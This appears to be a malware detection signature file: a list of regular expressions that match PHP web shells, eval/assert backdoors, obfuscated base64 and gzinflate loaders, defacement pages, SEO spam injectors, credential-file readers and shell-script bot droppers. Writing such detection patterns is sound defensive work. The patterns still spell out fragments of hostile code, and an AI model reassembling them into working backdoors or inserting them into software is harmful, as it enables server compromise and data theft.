qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}.+?function\s+([A-z0-9]{1,20})\(\)\{\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,100})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,100})\"\;\s+return\s+\"\{\$([A-z0-9]{1,20})\}\{\$([A-z0-9]{1,20})\}\"\;\s+\}\s+\?>/is,
qr/<\?php\s+\$alphabet\s+\=.+?\$string\s+\=.+?\$array\_name.+?\$f\(\)\;/is,
qr/<\?php\s+\@\'\$.+?x7\=http\:\/\/.+?\.php\s+cache=.+?\(\)\;\Z/is,
qr/<\?php\s+set\_magic\_quotes\_runtime\(0\)\;\s+if\(strtolower\(substr\(PHP\_OS\,0\,3\)\).+?Command\s+completed<\/b><\/center>\"\;\s+\}\s+exit\;\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}.+?\"\)\{return\s+preg\_match\(\"\/\(google\.co\.jp\|yahoo\.co\.jp\|bing\)\/.+?return\s+\$([A-z0-9]{1,20})\;\}\Z/is,
qr/<\?if\(\$\_GET\[\'mod\'\]\)\{if\(\$\_GET\[.+?file\_get\_contents\(\'http\:\/\/.+?gethostbyname.+?dbl\.spamhaus\.org\'\)\;.+?\?>/is,
qr/<\?php.+?die\(\"test\s+success\"\)\;.+?exit\;\s+\}\s+\?>/is,
qr/error\_reporting\(0\)\;\s+\$query.+?\'Googlebot\'\)\s+\!\=\=\s+false\)\{.+?return\s+\$file\_contents\;\s+\}/is,
qr/a\:4\:\{s\:1\:.+?RewriteEngine.+?<\/IfModule>\"\;\}/is,
qr/<\?php.+?if\(isset\(\$\_COOKIE\[.+?array\(.+?implode\(.+?\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?if\(isset\(\$\{\$([A-z0-9]{1,20})\[([0-9]{1,5})\]\.\$.+?\.\$([A-z0-9]{1,20})\[([0-9]{1,5})\]\]\)\;\}\s+\?>/is,
qr/<\?php.+?str\_ireplace\(\"i\"\,\"\"\,\"iibiasiieii6iii4iiii\_iideicioidieii\"\).+?\?>/is,
qr/<\?php\s+preg\_replace\(\"\/([A-z0-9]{1,20})\/e\"\,\s+\"ev\"\.\"al\(\'\"\.\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\.\"\'\)\"\,\s+\"([A-z0-9]{1,20})\s+([A-z0-9]{1,20})\"\)\;\s+\?>/is,
qr/<\?\s+error\_reporting\(0\)\;\s+set\_time\_limit\(0\)\;\s+\$a\=\$\_COOKIE\[\'a\'\].+?\$unkhost\=.+?die\(\)\;\}\s+\?>/is,
qr/<\?php\s+\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;create\_function\(.+?\)\;\s+\?>/is,
qr/<\?php.+?\/\/\s+OS\s+system\.\s+function\s=a.+?array\_map\s+\(\'a\'\,\s+array\s+\(\$\_POST\[\'f\'\].+?\;\Z/is,
qr/<\?php\s+\/\/header.+?\$MaxQuantity\=\$\_REQUEST\[\'MaxQuantity\'\]\;.+?mkdir\(\$path\,\s+0777\)\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$\{.+?\=getIp\(\).+?exit\(\)\;\}function\s+http\_request\(\$params\)\{\$\{.+?\=explode\(.+?\}\;\}\s+\?>/is,
qr/<\?php\s+\$wp\_\_wp\=\'base\'\.\(32\*2\)\.\'\_de\'\.\'code\'\;\$wp\_\_wp\=\$wp\_\_wp\(str\_replace\(.+?\(isset\(\$\_COOKIE\[\'wp\_wp\'\]\).+?<\/form>/is,
qr/<\?php\s+\$\{\"GLO.+?\]\;exit\(\)\;\}error\_404\(\)\;function\s+is\_good\_ip\(\$ip\)\{\$\{.+?\}\)\;\}else\s+return\s+FALSE\;if\(\$\{\$\{\"GL.+?\?>/is,
qr/\}\s+\}\s+\@ini\_set.+?WSO\_VERSION.+?call\_user\_func\(\'action\'\s+\.\s+\$\_POST\[\'a\'\]\)\;\s+exit\;/is,
qr/\}\s+\}\s+\@ini\_set.+?WSO\_VERSION.+?exit\;\s+\?>/is,
qr/<\?php\s+header\(\"Content\-type.+?\@system\(\"killall\s+\-9\s+\"\.basename\(\"\/usr\/bin\/host\"\)\)\;.+?\@system\(\"\.\/1\.sh\"\)\;\s+\?>/is,
qr/<\?php\s+\$\{\"G.+?\=getUseragent\(\).+?\=str\_replace\(.+?\]\}\;\}\s+\?>/is,
qr/<\?php\s+\$s\=\@\$\_GET\[2\]\;if\(md5\(\$s\.\$s\)\=\=\"([A-z0-9]{1,32})\"\s+\&\&\s+\(\$p\=\'pr\'\.\'eg\_\'\.\'re\'\.\'place\'\)\s+\&\&\s+\(\$r\=\'str\'\.\'\_rot\'\.\'13\'\)\)\{\$p\(\'\/ad\/\'\.\'e\'\,\'\@\'\.\$r\(\'r\'\.\'in\'\.\'y\'\)\.\'\(\$\_POST\[\$s\]\)\'\,\'add\'\)\;\}\;echo\s+dirname\(\_\_FILE\_\_\)\;\?>/is,
qr/\#\!\/bin\/sh\s+cd.+?libworker\.so.+?exit\s+0/is,
qr/<\?php\s+\/\/\s+NEXT\s+LINE.+?function\s+xor\_enc2\(\$str\).+?\;\?>/is,
qr/\#\!\/bin\/bash\s+DIRNAME\=\'\.gohome\'.+?bot\_works\(\)\s+\{.+?echo\s+\'done\'\;/is,
qr/\#\!\/bin\/sh\s+DIRNAME\=\'\.jshome\'.+?if\s+\[\s+\$\{MACHINE\_TYPE\}\s+\=\=\s+\'x86\_64\'\s+\]\;\s+then.+?echo\s+\'done\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?strlen\s+\(\$([A-z0-9]{1,20})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?\$([A-z0-9]{1,20})\=array\(\)\;\s+foreach\(\$\_SERVER\s+as\s+\$([A-z0-9]{1,20}).+?if\(\!empty\(\$this\->([A-z0-9]{1,20})\)\)return\s+\$this\->([A-z0-9]{1,20})\;\s+return\s+false\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"ass\"\.\"ert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\s+echo\s+([0-9]{1,20})\+([0-9]{1,20})\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=str\_replace\(\"\[t1\]\"\,.+?include\(\"temp1\-1\.php\"\)\;\s+fclose\(\$([A-z0-9]{1,20})\)\;\s+\$([A-z0-9]{1,20})\=fopen\(\"temp1\-1\.php\"\,\"w\"\)\;\s+fclose\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+\@session\_start\(\)\;.+?\/\/PASSWORD\s+CONFIGURATION.+?\=strrev\(\'edoced\_46esab\'\)\;\$s\=gzinflate\(\$.+?\)\;create\_function\(\'\'\,\"\}\$s\/\/\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?implode\(array\_map\(.+?\-1\;\s+\?>/is,
qr/<\!DOCTYPE\s+HTML\s+PUBLIC.+?Hacked\s+By\s+Dr\.Shap7\-Nine.+?<\/html>/is,
qr/<\?php\s+\/\/([A-z0-9]{1,20})\s+\$\{.+?\}\=\=\=\"\"\|\|strrpos\(\$\{\$.+?\}\;exit\(\)\;\}\}\}\s+\/\/([A-z0-9]{1,20})\s+\?>/is,
qr/<\!DOCTYPE.+?<h1>Index\s+of\s+\/<\/h1>.+?<\/html>/is,
qr/<\?php\s+\$password\s+\=\s+\"([A-z0-9]{1,20})\".+?function\s+TestWriteable\(\).+?HtmlFoot\(\)\;\s+exit\;\s+\}\s+\?>/is,
qr/<\?php\s+header\(\"Location\:\s+http\:\/\/.+?\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;.+?\}\s+\?>/is,
qr/GIF89a\@\s+<\?php.+?MulCiShell.+?ob\_end\_flush\(\)\;\s+\?>/is,
qr/<\?php\s+echo\s+eval\(base64\_decode\(str\_replace\(\'\*\'\,\'a\'\,str\_replace\(\'\%\'\,\'B\'\,str\_replace\(\'\~\'\,\'F\'\,str\_replace\(\'\_\'\,\'z\'\,str\_replace\(\'\$\'\,\'x\'\,str\_replace\(\'\@\'\,\'d\'\,str\_replace\(\'\^\'\,\'3\'.+?\'\)\)\)\)\)\)\)\)\)\;/is,
qr/<\?php\s+\/\/\/\s+WebShell.+?echo\s+\"sent\_error\"\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+define\(\'TMP\'\,\'\.\/tmp\/\'\)\;\s+define\(\'BUF\'\,65536\)\;\s+define\(\'ZLEVEL\'\,9\)\;.+?header\(\"STATUS\:\s+OK\"\)\;\s+\}/is,
qr/<\?php\s+\$cfg\=.+?\)\)\{echo\s+\$goto\_body\;\}\s+\?>/is,
qr/<\!DOCTYPE.+?<title>404.+?<address>Apache\/2\.4.+?<\/html>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1})\"\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\)\;\s+\?>/is,
qr/<\!DOCTYPE\s+html>\s+<html\s+lang\=\"en\-us\"><head><title>Hacked\s+by\s+AnoaGhost.+?<\/html>/is,
qr/GIF89a\s+BlaCkB0x\s+<\?\$k\=\"ass\"\.\"ert\"\;\s+\$k\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'admin1234\@\#\'\]\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\$.+?\'firoERs\".+?\]\}\(\)\;\}\s+\?>/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\s+\{.+?1337\)\;\s+else\Z/is,
qr/<html>\s+<head><title><\/title>\s+\<\/head>\s+<body>\s+<\?php\s+\/*\s+\*\s+REVISION.+?if\s+\(md5\(md5\(\$\_REQUEST\[.+?print\s+\"ERROR\:\s+7\s+UNKNOWN<br\/>.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+class\s+([A-z0-9]{1,20})\s+\{\s+public\s+function\s+\_\_construct\(\)\s+\{\s+\$([A-z0-9]{1,20})\s+\=\s+\@\$\_COOKIE\[\'([A-z0-9]{1,20})\'\]\;\s+if\s+\(\$([A-z0-9]{1,20})\)\s+\{\s+\$option\s+\=\s+\$([A-z0-9]{1,20})\s+\(\@\$\_COOKIE\[\'([A-z0-9]{1,20})\'\]\)\s+\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\s+\(\s+\@\$\_COOKIE\[\'([A-z0-9]{1,20})\'\]\)\s+\;\s+\$option\s+\(\s+\"\/([A-z0-9]{1,20})\/e\"\s+\,\s+\$([A-z0-9]{1,20})\s+\,\s+([A-z0-9]{1,20})\s+\)\s+\;\s+\}\s+else\s+\{\s+header\(\"HTTP\/1\.0\s+404\s+Not\s+Found\"\)\;\s+\}\s+\}\s+\}\s+\$content\s+\=\s+new\s+([A-z0-9]{1,20})\;/is,
qr/<\?php\s+\$a\=\$\_POST\[\'c\'\]\;\@EvAl\s+\(\$a\)\;\?>/is,
qr/<\?\s+if\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\=\=\"([A-z0-9]{1,20})\"\)\{\s+function\s+getDir\(\$dir\)\s+\{\s+\$dirArray\[\]\=NULL\;.+?<\/label>\s+<\/form>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$file_name.+?function\s+getDirContents\(\$dir\)\s+\{.+?getDirContents\(\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\)\;\s+\}\}\s+\}\s+\}\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+if\s+\(\s+\$\_REQUEST\[\"array\"\]\s+\)\s+\{\s+\@assert\(base64\_decode\(\$\_REQUEST\[\"array\"\]\)\)\;\s+\/\/debug\s+message\s+echo\s+\"Array\s+sort\s+completed\"\;\s+exit\(\)\;\s+\}\s+echo\'\s+PAGE\s+NOT\s+FOUND\'\;\s+\}\s+\?>/is,
qr/<\?php\s+set\_time\_limit\(0\)\;\s+ignore\_user\_abort\(\)\;.+?echo\s+\$mail\.\"\s+\-\s+sending\s+ok.+?\}\s+\}\s+\?>/is,
qr/\/\/installbg\s+\$rifilename\=\'\/home\/([A-z0-9]{1,20})\/public\_html\/.+?\'\;\s+require\(\"\$rifilename\"\)\;\s+\/\/installend/is,
qr/\;\(function\(\)\{var\s+k\=navigator\[b\(\"st\{n\(e4g9A2r\,exs\,u8\"\)\]\;var\s+s\=document\[b\(\"je\,i\{kaofo6c.+?async\=true\;w\.src\=.+?length\-1\;v>\=0\;v\-\-\)\{n\+\=y\[v\]\;\}return\s+n\;\}\}\)\(\)\;/is,
qr/<\?php\s+\$user\_agent\_to\_filter\s+\=\s+array\(.+?if\(\@\$isbot\)\{.+?echo\s+\$result\;\s+\}\s+\?>/is,
qr/<\?php\s+\$key\s+\=\'([A-z0-9]{1,20})\'\;\s+\$key\s+\.\=.+?eval\(\$b\(\$new\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*\s+\(c\)\s+2011\s+The\s+potion\s+hissed.+?\=base64\_decode\(.+?\=\@gzinflate\(strrev\(.+?\=create\_function\(.+?\}\s+\?>/is,
qr/<\?php\s+\/\*\s+\(c\)\s+2004.+?base64\_decode\(.+?gzinflate\(strrev\(.+?if\(crc32\(.+?create\_function.+?\}\s+\?>/is,
qr/<\?php\s+if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{\s+echo\s+\"file\s+test\s+okay\"\;.+?\$data\s+\=\s+base64\_decode\(.+?die\(\"([0-9]{1,20})\"\)\;\s+\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*6\)\;.+?\}else\{echo\s+\"false\"\;\}\s+\}\s+\?>/is,
qr/<\?php\s+\$scriptname\=\s+str\_replace\(.+?if\s+\(file\_exists\(\"wp\-content\"\)\).+?unlink\(\$scriptname\)\;\s+\?>/is,
qr/<\?php.+?Twenty\_Sixteen.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php.+?str\_ireplace\(\"([A-z0-9]{1})\"\,\"\"\,\"([A-z]{1,10})b([A-z]{1,10})a([A-z]{1,10})s([A-z]{1,10})e([A-z]{1,10})6([A-z]{1,10})4([A-z]{1,10})\_([A-z]{1,10})d([A-z]{1,10})e([A-z]{1,10})c([A-z]{1,10})o([A-z]{1,10})d([A-z]{1,10})e([A-z]{1,10})\"\).+?}\s+\?>/is,
qr/<\?php\s+error\_reporting\(E\_ERROR.+?\$wp\_code\s+\=.+?\?>/is,
qr/<\?php\s+\$s\_pass\s+\=\s+\"\"\;\s+eval\(\"\W\$x\=gzin\"\.\"flate\(base\"\.\"64\_de\"\.\"code\(.+?\)\)\;\"\)\;eval\(\"\?>\"\.\$x\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$([A-z0-9]{1,20})\=\@\$([A-z0-9]{1,20})\(\'\$([A-z0-9]{1,20})\'\,\'ev\'\.\'al\'\.\'\(\"\?>\"\.gz\'\.\'inf\'\.\'late\'\.\'\(\s+bas\'\.\'e64\'\.\'\_de\'\.\'co\'\.\'de\(\$([A-z0-9]{1,20})\)\)\)\;\'\)\;\@\$([A-z0-9]{1,20}).+?\)\;/is,
qr/<\?php\s+\@eval\(\$\_POST\[\".+?\"\]\)\;\?>/is,
qr/if\(isset\(\$\_REQUEST\[\'sort\'\]\)\)\{\s+\$string\s+\=\s+\$\_REQUEST\[\'sort\'\]\;\s+\$array\_name\s+\=\s+\'\'\;\s+\$alphabet.+?\$ar\s+\=\s+array\(.+?foreach\(\$ar\s+as\s+\$t\)\{\s+\$array\_name\s+\.\=\s+\$alphabet\[\$t\]\;\s+\}\s+\$a\s+\=\s+strrev\(.+?\$f\s+\=\s+\$a\(\"\"\,\s+\$array\_name\(\$string\)\)\;\s+\$f\(\)\;\s+exit\(\)\;\s+\}/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+set\_time\_limit\(0\)\;.+?class\s+O\s+\{\s+private\s+\$content\_\s+\=.+?execute\(\)\;/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\=str\_ireplace\(.+?define\(\'([A-z0-9]{1,20})\'\,\s+\_\_DIR\_\_\)\;.+?\?>/is,
qr/<\?php.+?error\_reporting\(([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=\!preg\_match\(\'\~\^\(unsafe\_raw\)\?\$\~\'\,ini\_get\(\"filter\.default\"\)\)\;if\(\$([A-z0-9]{1,20})\|\|ini\_get\(\"filter\.default\_flags\"\)\)\{foreach\(array\(\'\_GET\'\,\'\_POST\'\,\'\_COOKIE\'\,\'\_SERVER\'\).+?lzw\_decompress\(.+?/is,
qr/<\?php\s+\$suc\s+\=\s+false\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\s+\.\s+\'\/wp\-config\.php\'\;.+?\$([A-z0-9]{1,20})\s+\=\s+\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\s+\.\s+\'\/configuration\.php\'\;.+?if\(\$suc\s+\!\=\s+true\)\s+\{\s+echo\s+\'Not\s+found\s+file\'\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+function\s+([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\s+\{\s+return\s+\$([A-z0-9]{1,20})\s+\^\s+str\_repeat\s+\(\$([A-z0-9]{1,20})\,\s+ceil\s+\(strlen\s+\(\$([A-z0-9]{1,20})\)\s+\/\s+strlen\s+\(\$([A-z0-9]{1,20})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$c\=base64\_decode\(\'.+?\=\'\)\.\$\_GET\[n\]\.\'t\'\;\@\$c\(\$\_POST\[x\]\)\;\?>abcabcabc/is,
qr/<\?php\s+\(\$sun\s+\=\s+\$\_POST\[\'nnd\'\]\)\s+\&\&\s+\@preg\_replace\(\'\/ad\/e\'\,\'\@\'\.str\_rot13\(\'riny\'\)\.\'\(\$sun\)\'\,\s+\'add\'\)\;\?>lslfjsdlfkjsdjlfSDFlfjp7934937kdjfhshdofowe\@\#\$\#\$\%\$\&\*\^\&\*\#\$\%\#\$\%\#\@\$\#\%jkdfhghgiernqnwv\_\+\&\%\$\&\#\^\%\*\(QVRJLQWERLQWWER\$\%\%\&\%\&\@\%\#\$\%\^\%\&\^\&\*\*\&\(\)\(\)\%\@\$\!\#\%\%/is,
qr/<\?php\s+\$\{.+?\)\)\{\@ob\_clean\(\)\;echo\s+base64\_decode\(substr\(\$\{\$\{.+?\]\}\;\}break\;\}\}\}\}\}\s+\?>/is,
qr/<\?php\s+\(\$sun\s+\=\s+\$\_POST\[\'\#\#\#\'\]\)\s+\&\&\s+\@preg\_replace\(\'\/ad\/e\'\,\'\@\'\.str\_rot13\(\'riny\'\)\.\'\(\$sun\)\'\,\s+\'add\'\)\;\?>/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;\s+\$O\_0OO\_\_0O0\=.+?\$O\_OO0\_O0\_0\=urldecode\(.+?\$OOO0O0\_0\_\_\)\;exit\(\)\;\}\'\)\;\$\{.+?\]\(\)\;\?>/is,
qr/<\?php\s+\$\_\_\_\_\=base64\_decode\(.+?<input\s+type\=\"submit\"\s+value\=\"go\"\/><\/form><\/center>\'\)\;\?>/is,
qr/<\?php\s+error\_reporting\(E\_ALL\s+\&\s+\~E\_NOTICE\)\;\s+\$m\s+\=\s+get\_magic\_quotes\_gpc\(\)\;\s+\$uploadfloder.+?\}\s+else\s+\{\s+echo\s+\"ok\"\;\s+\}\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$domain\s+\=\s+\'n\.liveupdates\.host\'\;.+?\$s\s+\=\s+dns\_get\_record\(\$domain\,\s+DNS\_TXT\)\;.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$m\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+function\s+result\(\$data\).+?srand\(seed\(\)\)\;.+?echo\(result\(array\(.+?\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*.+?\]\)\;\}exit\(\)\;\}/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;\s+\$O\_OO\_\_000O\=\'1044\'\;\s+\$O0O00OO\_\_\_\=urldecode\(.+?\]\(\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\=str\_rot13\(\'([A-z0-9]{1,20})\_([A-z0-9]{1,20})\'\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\'([A-z0-9]{1,20})64\_([A-z0-9]{1,20})\'\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\'([A-z0-9]{1,20})\'\)\;\$a\=\'rt\'\;\s+\$b\=\'as\'\;\s+\$b\.\=\'se\'\s+\.\s+\$a\;\@\$b\(\$([A-z0-9]{1,20})\(\'ri\'\s+\.\s+\'ny\(\W'\'\s+\.\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\s+\.\s+\'\\'\)\'\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\s+\{\s+\$([A-z0-9]{1,20})\=base64\_decode\(\$([A-z0-9]{1,20})\)\;.+?if\(\$([A-z0-9]{1,20})\=\=strlen\(\$([A-z0-9]{1,20})\)\)\s+break\;\s+elseif\(.+?\$([A-z0-9]{1,20})\=\(ord\(.+?if\(\!empty\(\$this\->([A-z0-9]{1,20})\)\)return\s+\$this\->([A-z0-9]{1,20})\;\s+return\s+false\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\@set\_time\_limit\(0\)\;\s+\@ini\_set\(\'display\_errors\'\,\s+1\)\;.+?if\(\!function\_exists\(\'file\_put\_contents\'\)\)\s+\{.+?if\(isset\(\$\_GET\[\"rdir\"\]\)\&\&\s+\$\_GET\[\"url\"\]\)\{.+?function\s+curl\_get\_from\_webpage\_one\_time\(\$url\,\$proxy\=\'\'\,\$tms\=0\)\{.+?unlink\(\"\.\/wp\-content\/uploader\.php\"\)\;\s+\?>/is,
qr/<\?php.+?Joomla\.Administrator.+?define\(\'\_JEXEC\'\,\s+\'([A-z0-9]{250,})\'\)\;\s+defined\(\'\_JEXEC\'\)\s+or\s+die\;.+?echo\s+\'<form\s+method\=\"post\"\s+action\=\"\">\s+<input\s+type\=\"input\"\s+name\=\s+\"j\_submenu\"\s+value\=\"\"\/><input\s+type\=\"submit\"value\=\"\&gt\;\"\/>\s+<\/form>\'\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,\s+0\)\;.+?\$arr\_word\[0\]\[\].+?\$arrKeywz\[\].+?\$strRand\[0\].+?str\_ireplace\(str\_replace\(.+?\/\/file\s+end/is,
qr/<\?php\s+\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\s+\#\s+Xai\s+Syndicate\s+\#\s+\#NoName\s+Shell\s+Release\#\s+\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\s+\$auth\_pass\s+\=.+?eval\(str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(\(\$noname\)\)\)\)\)\)\;/is,
qr/<\?php\s+echo\s+\"Priv8\s+Home\s+Root\s+Uploader.+?echo\s+\"gagal\s+upload\"\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php.+?BlackHat\s+Shell.+?\$auth\_pass.+?\$nusantarablackhat.+?eval\(str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(\(\$nusantarablackhat\)\)\)\)\)\)\;/is,
qr/<\!DOCTYPE\s+html>\s+<head>\s+<\!\-\-\s+Meta\s+\-\->\s+<meta\s+name\=\"keywords\"\s+content\=\"Hacked\">.+?<\!\-\-\s+end\:\s+index\s+\-\->/is,
qr/<html>\s+<head>\s+<title>\?\?\?\!\!\!<\/title>.+?<h1>\s+HACKED\s+BY\s+CYBERSCRY\s+<\/h1>.+?\/font><\/marquee><br><br><br>/is,
qr/<\?php\s+\/\/silent\s+is\s+gold\s+eval\(str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(.+?\)\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\/\/silent\s+is\s+gold\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;/is,
qr/<\?php\s+\/\*\s+PHP\s+Encryption\s+By\s+FathurFreakz.+?\(substr\(file\_get\_contents\(\_\_file\_\_\)\,([0-9]{1,10})\,strlen\(file\_get\_contents\(\_\_file\_\_\)\)\)\)\)\;\_\_halt\_compiler\(\)\;\s+\@FathurFreakz.+?\/([A-z0-9]{1,20})/is,
qr/<\?php\s+if\(\!class\_exists\(\'OneG\'\)\)\{if\(function\_exists\(\'is\_user\_logged\_in\'\)\).+?return\s+\$content\;\}\}\$ratel\=new\s+OneG\;\$ratel\->init\(\$uri\,\$ua\)\;\}/is,
qr/<\!DOCTYPE\s+HTML\s+PUBLIC.+?<title>\:\:\s+ByPass.+?\$file\s+\=\s+fopen\(\"config\.izo\"\s+\,\"w\+\"\)\;.+?<\/html>/is,
qr/<\?php\s+\/\*\*\s+Copyright\s+\©\s+2007.+?\*\/\s+eval\(gzuncompress\(base64\_decode\(.+?\)\)\)\;/is,
qr/<\?php\s+\$auth\_pass\s+\=.+?\$default\_action.+?\$default\_use\_ajax.+?\$default\_charset.+?\)\)\;\s+return\;\s+\?>/is,
qr/<\?php\s+if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\!\=.+?\$dflt\_actn\s+\=\s+\'FilesWin\'\;.+?\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?function\s+scan\_dir\(\$dirname\)\{.+?if\s+\(\!function\_exists\(\'file\_put\_contents\'\)\)\s+\{.+?if\s+\(isset\(\$\_POST\[\'startreplace\'\]\)\)\{.+?\s+echo\s+\'Finish\!\s+Dir\:\s+\'\.\$dir\.\'\s+Replace\:\s+\'\s+\.\s+\$repl\s+\.\s+\'\s+Files\:\s+\'\.\s+\$coun\;\s+\}\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\s+\#\s+mod\_add\_custom\_css.+?if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\=\=.+?eval\(\$data\_row\->htmlcode\)\;\s+\}\s+\?>/is,
